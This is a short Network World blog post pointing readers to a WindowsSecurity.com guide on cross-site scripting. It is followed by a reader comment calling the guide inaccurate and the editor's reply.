WindowsSecurity.com published a guide today that promises to teach you everything you need to know about understanding and preventing the cross site scripting (XSS) attack.
XSS is an extremely common application-layer web attack. It embeds a malicious script on a Web page and when a Web browser comes along, it executes the script. This is a common method used by Bothearders to acquire zombies.
Says the guide:
"Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits."
Advertisement: |
The Microsoft Subnet blog is the official blog of the Network World's Microsoft Subnet community, managed by editor Julie Bort. Microsoft Subnet is the independent voice of Microsoft customers and is your gateway to daily Microsoft news, blogs, opinion, books, prize giveaways and more. Visit the Microsoft Subnet index page daily, and while you are there, subscribe to the Microsoft newsletter. The newsletter includes news generated by the Microsoft Subnet community as well as other Microsoft news stories published by Network World.
The Leader in Network Knowledge
Worst Article Ever
I read the article that this story links to and spent the next few minutes laughing and yelling at my screen. The description of how the XSS works "by sending the user to a different site, that steals their session cookie", that is wrong! The 'other' site doesn't have access to your cookies!!
Then in the paragraph after the example they say that this approach is used in SPAM emails too! "A user is sent an email saying that their account has been compromised and they need to click a link fix it, but the link directs them to a different evil page." That isn't a XSS that is a Phishing SPAM!
And where in the article does it suggest a fix? It doesn't. NW, did you actually read this article?
Well, then, never mind
See Microsoft Subnet for more Microsoft-related news, blogs, security alerts, technical group.
I'm the editor at Network World that posted this. I'm out there searching around for Microsoft-related news from other sites as part of Microsoft Subnet coverage. There is very little that Microsoft does that NWW doesn't already cover, so sometimes I go to the fringes a bit. I did read the article, but apparently not carefully enough.
Tell you what ... you send me Microsoft articles that you like. E-mail the links to me at jbort@nww.